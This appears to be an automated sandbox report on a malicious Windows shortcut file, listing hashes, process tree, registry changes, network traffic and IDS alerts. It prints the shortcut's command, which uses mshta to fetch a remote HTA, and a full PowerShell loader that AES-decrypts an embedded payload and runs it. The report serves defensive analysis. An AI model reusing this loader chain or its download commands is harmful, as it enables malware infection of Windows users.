File name: | ITEMS -98765456.lnk |
Full analysis: | https://app.any.run/tasks/5a51d459-6caa-47dd-9b27-715ca2ec92bb |
Verdict: | Malicious activity |
Analysis date: | December 26, 2023, 05:55:18 |
OS: | Windows 11 Professional (build: 22000, 64 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=13, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized |
MD5: | 8D35E46911450C731F76F311BAAD7EF0 |
SHA1: | AE1D21E7C501CDE5631971A39349B4A18CB52A7F |
SHA256: | 1BF287BAF71F2A0872005E73399685DF6B3A2B27CB2F27511DEB4BDF566FBE67 |
SSDEEP: | 12:8eUm/3BVSXvk44X3ojsqzKtnWNYyW+UcCsvXhrelOG5zbdpYrn1IlI5u9bOVn1IJ:8s/BHYVKVW+r+/CWtYOodd79dsHmBn |
.lnk | | | Windows Shortcut (100) |
---|
Flags: | IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon |
---|---|
FileAttributes: | (none) |
TargetFileSize: | - |
IconIndex: | 13 |
RunWindow: | Show Minimized No Activate |
HotKey: | (none) |
TargetFileDOSName: | powershell.exe |
Description: | line |
RelativePath: | ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
CommandLineArguments: | \W*\\\*2\\\msh*e ('http'+'://thanhancompany.com/ta/line'+'.hta') |
IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1768 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" \W*\\\*2\\\msh*e ('http'+'://thanhancompany.com/ta/line'+'.hta') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
2596 | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3604 | "C:\Windows\System32\mshta.exe" http://thanhancompany.com/ta/line.hta | C:\Windows\System32\mshta.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
4112 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH | powershell - } | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | mshta.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1672 | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5340 | "C:\Windows\system32\cmd.exe" /c powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH | powershell - | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3876 | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
4288 | powershell.exe $lQDGqRYO = 'AAAAAAAAAAAAAAAAAAAAAHDMFFr4TQjK1c7L+nJlzUiYo5VGy78t3YPii+fwvaB0CLH1qjrp4HxCT9XFZI9uzeVMMRmrR74VbKxaYqjdGMf84OZpd4IgPgqmgJIPDUYcTMqEB8EKnkcXlBQc65XVLu7sHhDAVYiFg+wR5R9IO7VERDScrW/Y9pII6W+i+h/c7dg5t7PXqGS2A8kK3Qj6jzoagZSSJdvXGMa/7ImW/TWvrKmRWTEECLJxQjKpe3cFIAMos/z2zJXLcBPGbZoyv9i01DCwSHm1AT8jyWF+s3Ptaw/jePExY9n71SUPNX78CCgphH3OzFg0G13+t4JzuAjjHNloSgDpBC0IFy5DWZ8CUYa6TbNRkKGbsQRVKYfSTbPcgjHKxgNgB64/CmIwOdbYQNqa/VnFxV1p0uhd6umgZBz+K0W2djHcbInuCBj4q4MaoxLsAGEgb4mRmCCPsG/ybt0gy+YKNJTZZp9n5RT4+civpZ4MYa/ccoQgSoUYeOJgUUOWMc2i4Q6xa8VerH94Mtt9mY7zro3PEaCil8EmZyYFvyDl7Ig3dRHQGONM8a0ReJtuzAxcxMPaInwD39QxQxxQ3n+7aXSXvNCbWpYvQ33IxeCGmV8KsxwkGFr9oYe1mXnC5M5rghRP6arH1kQtVFIoz5fXy/9fdIJjwzgfBN8H/X+ak1sQ8GhGuDKtIOAOVlIDVwMyuHxhLItRhN969cbURkpIwHvgAWC7ya/+7JrtQxLtwgcnvUqGvZMoidwPqmmHcQG72PLRtsA0gCnyKKGGK0DpDuDXXxdDLSejThngg87qpP1lJFcqWx0J/D2hIqlHIk2WHie9jzHOSP7kiSSq76FcgFMtd0fARxU/BJQGS/Y1W1UbayVkJm3kN1Iknx2eVJn4bVUc0GIjW+/M+qKi1H+DgQVAH/Gn1MklNjpGFOGc3vVu33uuevScf3hErFrdMHFjSuH+ILLxCDEEmObgxRnjW14ANsi/OOo=';$YvfBZo = 'cGJXc2ZaZWFKZ1phem9iaHp4cHlWdGtwWXpXWkFUb3I=';$qEyXZKV = New-Object 'System.Security.Cryptography.AesManaged';$qEyXZKV.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qEyXZKV.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qEyXZKV.BlockSize = 128;$qEyXZKV.KeySize = 256;$qEyXZKV.Key = [System.Convert]::FromBase64String($YvfBZo);$XWdmE = [System.Convert]::FromBase64String($lQDGqRYO);$HQkxvexs = $XWdmE[0..15];$qEyXZKV.IV = $HQkxvexs;$vFnUpSgaO = $qEyXZKV.CreateDecryptor();$YVtuKtCCl = $vFnUpSgaO.TransformFinalBlock($XWdmE, 16, $XWdmE.Length - 16);$qEyXZKV.Dispose();$ASJv = New-Object System.IO.MemoryStream( , $YVtuKtCCl );$mbWdpsh = New-Object System.IO.MemoryStream;$nprYzEcjd = New-Object System.IO.Compression.GzipStream $ASJv, ([IO.Compression.CompressionMode]::Decompress);$nprYzEcjd.CopyTo( $mbWdpsh );$nprYzEcjd.Close();$ASJv.Close();[byte[]] $jWJejyDQ = $mbWdpsh.ToArray();$axWiuKqH = [System.Text.Encoding]::UTF8.GetString($jWJejyDQ);$axWiuKqH | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5936 | powershell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.22000.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5248 | "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\admin\AppData\Roaming\blank.pdf" | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | powershell.exe | ||||||||||||
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Version: 22.3.20314.0 Modules
|
(PID) Process: | (3604) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3604) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3604) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3604) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3604) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (3604) mshta.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
(PID) Process: | (4112) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (4112) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (4112) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (4112) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
5936 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aknra21h.4im.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
4112 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_g1ql5mxj.iws.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
4288 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qgisjhmd.4dh.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
1768 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eo3v5mve.xov.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
1768 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NRBDW7BK27FE834PBTVI.temp | binary | |
MD5:677A49DC085EDD7387ECB03E135ADBB5 | SHA256:E40BA42416E477828DCA40BE4DC0994369DD833111064982C9011BE914E98B19 | |||
5740 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal | binary | |
MD5:693CD8A0C3142CF9696FDD8B62B4B854 | SHA256:DA71C5AA40F4E46E44DDA53FBC305059C00CF35F11C42A2E3A86AE5FF1643A28 | |||
4288 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m0ghyftm.pfi.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
5936 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p55xjyaw.bgn.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
5740 | Acrobat.exe | C:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt | text | |
MD5:E8A0E814D14CB38706064C3AC221964E | SHA256:77C1E1313CF8CBA6916CA38376F7FDD686904BC1A7E82BF915C3A021A7CE43B4 | |||
1768 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ctji1hnk.1my.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3604 | mshta.exe | GET | 200 | 192.185.191.127:80 | http://thanhancompany.com/ta/line.hta | unknown | html | 55.6 Kb | — |
2476 | AdobeARM.exe | GET | 200 | 23.48.23.54:80 | http://acroipm2.adobe.com/assets/Owner/arm/ReportOwner.txt | unknown | text | 4 b | — |
2476 | AdobeARM.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEARSlvj82CmnXclClPWkFaQ%3D | unknown | binary | 727 b | — |
2476 | AdobeARM.exe | GET | 200 | 23.48.23.54:80 | http://acroipm2.adobe.com/assets/Owner/arm/2023/12/OwnerAPI/Rdr.txt | unknown | text | 4 b | — |
5248 | Acrobat.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTk45WiKdPUwcMf8JgMC07ACYqr2AQUt2ui6qiqhIx56rTaD5iyxZV2ufQCEAWz1NCckkaDRqU%2FRpuMnaA%3D | unknown | binary | 471 b | — |
1412 | svchost.exe | GET | 200 | 2.21.20.140:80 | http://www.msftconnecttest.com/connecttest.txt | unknown | text | 22 b | — |
3884 | smartscreen.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?13b41378fce6cd72 | unknown | compressed | 4.66 Kb | — |
3884 | smartscreen.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D | unknown | binary | 471 b | — |
2476 | AdobeARM.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D | unknown | binary | 471 b | — |
5248 | Acrobat.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D | unknown | binary | 471 b | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4588 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
2864 | svchost.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
3884 | smartscreen.exe | 20.31.251.109:443 | checkappexec.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
1412 | svchost.exe | 2.21.20.155:80 | — | Akamai International B.V. | DE | unknown |
3884 | smartscreen.exe | 93.184.221.240:80 | ctldl.windowsupdate.com | EDGECAST | GB | unknown |
3884 | smartscreen.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | unknown |
3604 | mshta.exe | 192.185.191.127:80 | thanhancompany.com | UNIFIEDLAYER-AS-1 | US | unknown |
5944 | svchost.exe | 184.30.17.174:443 | fs.microsoft.com | AKAMAI-AS | DE | unknown |
6112 | OfficeC2RClient.exe | 52.109.89.18:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
5936 | powershell.exe | 167.99.136.52:443 | mag.wcoomd.org | DIGITALOCEAN-ASN | DE | unknown |
Domain | IP | Reputation |
---|---|---|
checkappexec.microsoft.com |
| unknown |
ctldl.windowsupdate.com |
| unknown |
ocsp.digicert.com |
| unknown |
thanhancompany.com |
| unknown |
mag.wcoomd.org |
| unknown |
hiqsolution.com |
| unknown |
cc-api-data.adobe.io |
| unknown |
geo2.adobe.com |
| unknown |
p13n.adobe.io |
| unknown |
login.live.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET POLICY Possible HTA Application Download |
— | — | Attempted User Privilege Gain | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl |
— | — | Misc activity | ET INFO Microsoft Connection Test |